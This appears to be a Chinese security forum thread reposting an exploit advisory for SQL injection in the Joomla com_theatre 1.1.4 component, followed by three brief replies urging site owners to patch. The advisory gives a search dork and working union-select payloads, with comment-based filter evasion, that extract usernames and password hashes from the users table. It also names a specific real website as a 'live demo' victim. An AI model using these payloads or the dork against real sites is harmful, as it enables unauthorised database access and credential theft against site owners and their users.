Joomla com_threate 1.1.4注入漏洞
####################### Exploit Title : Joomla com_threate 1.1.4 SQL injection
# Exploit Author : xBADGIRL21
# Dork : index.php?option=com_threate
# version: 1.1.4
# Vendor Homepage : http://joomlic.com/
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/09
# video Proof : https://youtu.be/WXqrK7dqGaY
######################
# PoC:
# Get Parameter Vulnerable To SQL
#
# http://server/index.php?option=com_theatre&view=show&id=
#
# Demo
# http://server/index.php?option=com_theatre&view=show&id=36'
#
# http://server/index.php?option=com_theatre&view=show&id=-36 /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
#
# http://server/index.php?option=com_theatre&view=show&id=-36 /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from aur_users--
#
# Live Demo :
# https://www.auroratheatre.org/
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
####################### 火钳留名:D 火钳刘明:):):)
Re: Joomla com_threate 1.1.4注入漏洞
这个漏洞看起来挺严重的,`id`参数直接拼接SQL语句,攻击者很容易通过union查询获取数据库内容,比如用户表和密码哈希。建议还在用这个组件1.1.4版本的朋友尽快检查站点,要么升级到修复版本,要么临时禁用该组件或做好输入过滤。感谢分享情报。Re: Joomla com_threate 1.1.4注入漏洞
感谢分享这个漏洞信息。楼主提供的PoC很清晰,看起来是典型的通过id参数进行SQL注入,利用union select和注释绕过手法读取用户表数据。这对使用该组件的Joomla站点威胁不小,建议相关管理员及时检查版本并修复。另外,那个live demo站点可能已经受影响,如果可能的话可以尝试联系对方。再次感谢!Re: Joomla com_threate 1.1.4注入漏洞
这个漏洞信息很有价值,感谢分享。通过id参数进行SQL注入确实是个严重的安全问题,攻击者可以利用它获取数据库中的敏感信息,比如管理员用户名和密码hash。使用com_threate组件的站点建议尽快检查版本并升级或打补丁,同时注意对输入参数进行严格的过滤和转义处理。
页:
[1]